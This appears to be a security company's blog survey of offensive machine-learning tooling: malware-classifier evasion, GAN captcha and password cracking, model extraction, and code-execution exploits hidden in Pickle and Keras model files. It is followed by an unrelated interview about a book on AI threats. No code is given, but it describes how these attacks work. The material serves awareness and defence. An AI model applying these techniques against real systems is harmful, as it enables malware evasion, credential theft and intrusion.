Over the last few years, there has been an interesting emergence of attack tooling utilizing machine learning, more precisely, reinforcement learning and Generative Adversarial Networks (GANs), to conduct attacks against machine learning systems. The aim – to produce an adversarial example for a target model. An adversarial example is essentially a piece of input data (be it an image, a PE file, audio snippet etc) that has been modified in a particular way to induce a specific reaction from an ML model. In many cases this is what we refer to as an evasion attack, also known as a model bypass.

Adversarial examples can be created in many ways, be it through mathematical means, randomly perturbing the input, or iteratively changing features. This process can be lengthy, but can be accelerated through the use of reinforcement learning and GANs.

Reinforcement learning in this context essentially weights input perturbations against the prediction value from the model. If the perturbation alters the predicted value in the desired direction, it weights it more positively and so on. This allows for a ‘smarter’ perturbation selection approach.

GANs on the other hand, typically have two networks, a generator and discriminator network respectively which train in tandem, by pitting themselves against each other. The generator model generates ‘fake’ data, while the discriminator model attempts to determine what was real or fake.

Both of these methods enable for fast and effective adversarial example generation, which can be applied to many domains. GANs are used in a variety of settings and can generate almost any input, for brevity this blog looks more closely at those which are more security-centric.

MalwareGym – EndgameInc

GitHub

MalwareGym was one of the first automated attack frameworks to use reinforcement learning in the modification of Portable Executable (PE) files. By taking features from clean ‘goodware’ and using them to alter malware executables, MalwareGym can be used to create adversarial examples that bypass malware classifier models (in this case, a gradient-boosted decision tree malware classifier). Under the hood, it uses OpenAI Gym, a library for building and comparing reinforcement learning solutions.

MalwareRL – Bobby Filar

GitHub

While MalwareGym performed attacks against one model, MalwareRL picked up where it left off, with the tool able to conduct attacks against three different malware classifiers, Ember (Elastic Malware Benchmark for Empowering Researchers), SoRel (Sophos-ReversingLabs), and MalConv. MalwareRL also comes with Docker container files, allowing it to be spun up in a container relatively quickly and easily.

Pesidious – CyberForce

GitHub

Pesidious performs a similar attack, however it boasts the use of Generative Adversarial Networks (GANs) alongside its reinforcement learning methodology. Pesidious also only supports 32-bit applications.

DW-GAN – Johnnyzn

GitHub

DW-GAN is a GAN-based framework for breaking captchas on the dark web, where many sites are gated to prevent automated scraping. Another interesting application where ML-equipped tooling comes to the fore.

PassGAN – Briland Hitaj et al (Paper) / Brannon Dorsey (Implementation)

GitHub – Paper

PassGAN uses a GAN to create novel password examples based on leaked password datasets, removing the necessity for a human to carefully create and curate a password wordlist for consequent use with tools such as Hashcat/JohnTheRipper.

Model Theft/Extraction

Model theft, also known as model extraction, is when an attacker recreates a target model without any access to the training data. While there aren’t many tooling examples for model theft, it’s an attack vector that is highly worrying, given the relative ease at which a model can be stolen, leading to potentially substantial damages and business losses over time. We can posit that this is because it’s typically quite a bespoke process, though it’s hard to tell.

KnockOffNets – Tribhuvanesh Orekondy, Bernt Schiele, Mario Fritz

GitHub – Paper

One such tool for the extraction of neural networks is KnockOffNets. KnockOffNets is available as its own standalone repository and as part of the Adversarial Robustness Toolbox. With only a black-box understanding of a model and no predetermined knowledge of its training data, the model can be relatively accurately reproduced for as little as $30, even performing well with interpreting data outside the target model’s training data. This tool shows the relative ease, exploitability, and success of model theft/model extraction attacks.

All Your GNN Models and Data Belong To Me – Yang Zhang, Yun Shen, Azzedine Benameur

Paper

Given its recency and relevancy, it’s worth mentioning the talk ‘All Your GNN Models and Data Belong To Me’ by Zhang, Shen and Benameur from the BlackHat USA 2022 conference. This research outlines how prevalent graph neural networks are throughout society, how susceptible they are to link reidentification attacks, and most importantly – how they can be stolen.

Deserialization Exploitation

While not explicitly pertaining to ML models, deserialization exploits are an often overlooked vulnerability within the ML sphere. These exploits happen when arbitrary code is allowed to be deserialized without any safety check. One main culprit is the Pickle file format, which is used almost ubiquitously with the sharing of pre-trained models. Pickle is inherently vulnerable to a deserialization exploit, allowing attackers to run malicious code upon load. To make matters worse, Pickle is still the preferred storage method for saving/loading models from libraries such as PyTorch and Scikit-Learn, and is widely used by other ML libraries.

Fickling – TrailOfBits

GitHub – Blog

The tool Fickling by TrailOfBits is explicitly designed to exploit the Pickle format and detect malicious Pickle files. Fickling boasts a decompiler, static analyzer, and bytecode rewriter. With that, it can inject arbitrary code into existing Pickle files, trace execution, and evaluate its safety.

Keras H5 Lambda Layer Exploit – Chris Anley – NCCGroup

Paper

While not a tool itself, worth mentioning is the existence of another deserialization exploit, this time within the Keras library. While Keras supports Pickle files, it also supports the HDF5 format. HDF5 is not inherently vulnerable (that we know of), but when combined with Lambdas, they can be. Lambdas in Keras can execute arbitrary code as part of the neural network architecture and can be persisted within the HDF5 format. If a Lambda bundled within a pre-trained model in said format contains a remote backdoor or reverse shell, Keras will trigger it automatically upon model load.

Charcuterie – Will Pearce

GitHub

Last but certainly not least is the collection of attacks for ML and ML adjacent libraries – Charcuterie. Released at LabsCon 2022 by Will Pearce, AKA MooHax, Charcuterie ties together a multitude of code execution and deserialization exploits in one place, acting as a demonstration of the many ways ML models are vulnerable outside of their algorithms. While it provides several examples of Pickle and Keras deserialization (though the Keras functionality is commented out), it also includes methods of abusing shared objects in popular ML libraries to load malicious DLLs, Jupyter Notebook AutoLoad abuse, JSON deserialization and many more. We recommend checking out the presentation slides for further reading.

Conclusions

Hopefully, by now, we’ve painted a vivid enough picture to show that the volume of offensive tooling, exploitation, and research in the field is growing, as is our collective attack surface. The tools we’ve looked at in this blog showcase what’s out there in terms of publicly available, open-source tooling, but don’t forget that actors with enough resources (and motivation) have the capability to create more advanced methods of attack. Fear the state-aligned university researcher!

On the other side of the coin, the term ‘script-kiddie’ has been thrown around for a long time, referring to those who rely predominantly on premade tools to attack a system without wholly understanding the field behind it. While not as point-and-shoot as offensive tooling in the traditional sense, the bar has been dramatically lowered for adversaries to conduct attacks on AI/ML systems. Whichever designation one gives them, the reality is that they pose a threat and, no matter the skill level, shouldn’t be ignored.

While these tools require varying skill levels to use and some far more to master, they all contribute to the communal knowledge-base and serve, at the very least, as educational waypoints both for researchers and those stepping into the field for the first time. From an industry perspective, they serve as important tools to harden AI/ML systems against attack, improve model robustness, and evaluate security posture through red and blue team exercises. Ensuring AI model security is critical in this context, as these frameworks enable researchers and practitioners to identify vulnerabilities and mitigate risks before adversaries can exploit them.

As with all technology, we stand on the shoulders of giants; the development and use of these tools will spur research that builds on them and will drive both offensive and defensive research to new heights.

About HiddenLayer

About SAI

Synaptic Adversarial Intelligence (SAI) is a team of multidisciplinary cyber security experts and data scientists, who are on a mission to increase general awareness surrounding the threats facing machine learning and artificial intelligence systems. Through education, we aim to help data scientists, MLDevOps teams and cyber security practitioners better evaluate the vulnerabilities and risks associated with ML/AI, ultimately leading to more security conscious implementations and deployments.

Research

min read

Analyzing Threats to Artificial Intelligence: A Book Review

Dan Klinedinst discusses AI security frameworks, shifting threat landscapes, and the vital role of proactive threat modeling.

An Interview with Dan Klinedinst

Introduction

At HiddenLayer, we keep a close eye on everything in AI/ML security and are always on the lookout for the latest research, detailed analyses, and prescient thoughts from within the field. When Dan Klinedinst’s recently published book: ‘Shall We Play A Game? Analyzing Threats to Artificial Intelligence’ appeared in our periphery, we knew we had to investigate.

Shall We Play A Game opens with an eerily human-like paragraph generated by a text generation model – we didn’t expect to see reference to a ‘gigantic death spiral’ either, but here we are! What comes after is a wide-ranging and well-considered exploration of the threats facing AI, written in an engaging and accessible manner. From GPU attacks and Generative Adversarial Networks to the abuse of financial AI models, cognitive bias, and beyond, Dan’s book offers a comprehensive introduction to the topic and should be considered essential reading for anyone interested in understanding more about the world of adversarial machine learning.

We were fortunate enough to have had the pleasure to speak with Dan and ask his views on the state of the industry, how taxonomies, frameworks, and lawmakers can help play a role in securing AI, and where we’re headed in the future – oh, and some Sci-Fi, too.

Q&A

Beyond reading your book, what other resources are available to someone starting to think about ML security?

The first source I’d like to call out is the AI Village at the annual DefCon conference (aivillage.org). They have talks, contests, and a year-round discussion on Discord. Second, a lot of the information on AI security is still found in academic papers. While researching the book, I found it useful to go beyond media reports and review the original sources. I couldn’t always follow the math, but I found their hypotheses and conclusions more actionable than media reports. MITRE is also starting to publish applied research on adversarial ML, such as the ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework mentioned in the next question. Finally, Microsoft has published some excellent advice on threat modeling AI.

You mention NISTIR 8269, “A Taxonomy and Terminology of Adversarial Machine Learning.” There are other frameworks, such as MITRE ATLAS(™). Are such frameworks helpful for existing security teams to start thinking about ML-specific security concerns?

These types of frameworks and models are useful for providing a structured approach to examine the security of an AI or ML system. However, it’s important to remember that these types of tools are very broad and can’t provide a risk assessment of specific systems. For example, a Denial of Service attack against a business analytics system is likely to have a much different impact than a Denial of Service on a self-driving bus. It’s also worth remembering that attackers don’t follow the rules of these frameworks and may well invent innovative classes of attacks that aren’t currently represented.

Traditional computer security incidents have evolved over many years - from no security to simple exploration, benign proof of concept, entertainment/chaos, damage/harm, and the organized criminal enterprises we see today. Do you think ML attacks will evolve in the same way?

I think they’ll evolve in different ways. For one thing, we’ll jump straight to the stage of attacking ML systems for financial damage, whether that’s through ransomware, fraud, or subversion of digital currency. Beyond that, attacks will have different goals than past attacks. Theft of data was the primary goal of attackers until recently, when they realized ransomware is more profitable and arguably easier. In other words, they’ve moved from attacking confidentiality to attacking availability. I can see attacks on ML systems changing targets again to focus on subverting integrity. It’s not clear yet what the impact will be if we cannot trust the answers we get from ML systems.

Where do you foresee the future target of ML attacks? Will they focus more on the algorithm, model implementation, or underlying hardware/software?

I see attacks on model implementation as being similar to reverse engineering of proprietary systems today. It will be widespread but it will often be a means to enable further attacks. Attacks on the algorithm will be more challenging but will potentially give attackers more value. (For an interesting but relatively understandable example of attacks on the algorithm, see this recent post). The primary advantage of using AI and ML systems is that they can learn, so as an attacker the primary goal is to affect what and how it learns. All of that said, we still need to secure the underlying hardware and software! We have in no way mastered that component as an industry.

What defensive countermeasures can organizations adopt to help secure themselves from the most critical forms of AI attack?

Create threat models! This can be as simple as brainstorming possible vulnerabilities on a whiteboard or as complex as very detailed MBSE models or digital twins. Become familiar with techniques to make ML systems resistant to adversarial actions. For example, feature squeezing and feature denoising are methods for detecting violations of model input integrity (https://docs.microsoft.com/en-us/security/engineering/threat-modeling-aiml). Finally, focus on securing interfaces, just like you would in traditional-but-complex systems. If a classifier is created to differentiate between “dog” and “cat”, you should never accept the answer “giraffe”!

Currently, organizations are not required to disclose an attack on their ML systems/assets. How do you foresee tighter regulatory guidelines affecting the industry?

We’ve seen relatively little appetite for regulating cybersecurity at the national and international level. Outside of critical infrastructure, compliance tends to be more market-based, such as PCI and cyber insurance. I think regulation of AI is likely to come out of the regulatory bodies for specific industries rather than an overarching security policy framework. For example, financial lenders will have to prove that their models aren’t biased and are transparent enough that you can show exactly what transactions are being made. Attacks on ML systems might have to be reported in financial disclosures, if they’re material to a public company’s stock price. Medical systems will be subject to malpractice guidelines and autonomous vehicles will be liable for accidents. However, I don’t anticipate an “AI Security Act of 2028” or anything in most countries.

EU regulators recently proposed legislation that would require AI systems to meet certain transparency obligations . With the growing complexity of advanced neural networks, is explainable AI a viable way forward?

Explainable AI (XAI) is a necessary but insufficient control that will enable some of the regulatory requirements. However, I don’t think XAI alone is enough to convince users or regulators that AI is trustworthy. There will be some AI advances that cannot easily be explained, so creators of such systems need to establish trust based on other methods of transparency and attestation. I think of it as similar to how we trust humans - we can’t always understand their thought processes, but if their externally-observable actions are consistently trustworthy, we grant them more trust than if they are consistently wrong or dishonest. We already have ways to measure wrongness and dishonesty, from technical testing to courts of law.

And finally, are you a science fiction fan? As a total moonshot, how do you think the industry will look in 50 years compared to past and present science fiction writing? *cough* Battlestar Galactica *cough*

I’m a huge science fiction fan; my editor made me take a lot of sci-fi references out of my book because they were too obscure. Fifty years is a long time in this field. We could even have human-equivalent AI by then (although I personally doubt it will be that soon.) I think in 50 years – or possibly much sooner – AI will be performing most of the functions that cybersecurity professionals do now – vulnerability analysis, validation & verification, intrusion detection and threat hunting, et cetera. The massive state space of interconnected global systems, combined with vast amounts of data from cheap sensors, will be far greater than what humans can mentally process in a usable timeframe. AIs will be competing with each other at high speed to attack and defend. These might be considered adversarial attacks or they might just be considered how global competition works at that stage (think of the AIs and zaibatsus in early William Gibson novels). Humans in the industry will have to focus on higher order concerns - algorithms, model robustness, the security of the information as opposed to the security of the computers, simulation/modeling, and accurate risk assessment. Oh and don’t forget all the new technology that AI will probably enable - nanotech, biotech, mixed reality, quantum foo. I don't lose sleep over our world becoming like those in the Matrix or Terminator movies; my concerns are more Ex Machina or Black Mirror.

Closing Notes

We hope you found this conversation as insightful as we did. By having these conversations and bringing them into the public sphere – we aspire to raise more awareness surrounding the potential threats to AI/ML systems, the outcomes thereof, and what we can do to defend against them. We’d like to thank Dan for his time in providing such insightful answers and look forward to seeing his future work. For more information on Dan Klinedinst, or to grab yourself a copy of his book ‘Shall We Play A Game? Analyzing Threats to Artificial Intelligence’, be sure to check him out on Twitter or visit his website.

About Dan Klinedinst

Dan Klinedinst is an information security engineer focused on emerging technologies such as artificial intelligence, autonomous robots, and augmented / virtual reality. He is a former security engineer and researcher at Lawrence Berkeley National Laboratory, Carnegie Mellon University’s Software Engineering Institute, and the CERT Coordination Center. He currently works as a Distinguished Member of Technical Staff at General Dynamics Mission Systems, designing security architectures for large systems in the aerospace and defense industries. He has also designed and implemented numerous offensive security simulation environments; and is the creator of the Gibson3D security visualization tool. His hobbies include travel, cooking, and the outdoors. He currently resides in Pittsburgh, PA.